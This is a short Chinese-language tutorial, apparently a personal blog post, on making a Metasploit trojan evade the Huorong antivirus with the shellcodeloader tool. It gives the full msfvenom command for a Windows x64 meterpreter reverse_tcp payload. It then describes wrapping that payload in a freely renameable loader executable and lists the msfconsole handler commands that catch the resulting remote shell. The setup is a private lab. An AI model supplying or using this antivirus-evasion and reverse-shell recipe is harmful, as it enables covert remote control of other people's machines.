Shellcodeloader免殺過火絨

題記

        今天腦子里面蹦出來個想法，免殺木馬然后cs上線，本來想讓cs與msf聯動的，但是出了點小問題，還是先研究免殺火絨吧。

環境

        Kali：192.168.0.119 win10:192.168.0.200

        工具地址：https://github.com/knownsec/shellcodeloader

步驟

1、在kali生成3.bin木馬。

        msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木馬移到工具上做免殺。

生成loder.exe軟件，可隨意改名，運行就能上線。

3、kali開啟監聽。

        msfconsole

        use exploit/multi/handler

        set payload windows/x64/meterpreter/reverse_tcp

        set lhost 192.168.0.119

        exploit

        然后運行exe

        上線

4、火絨檢測

        軟件運行后檢測。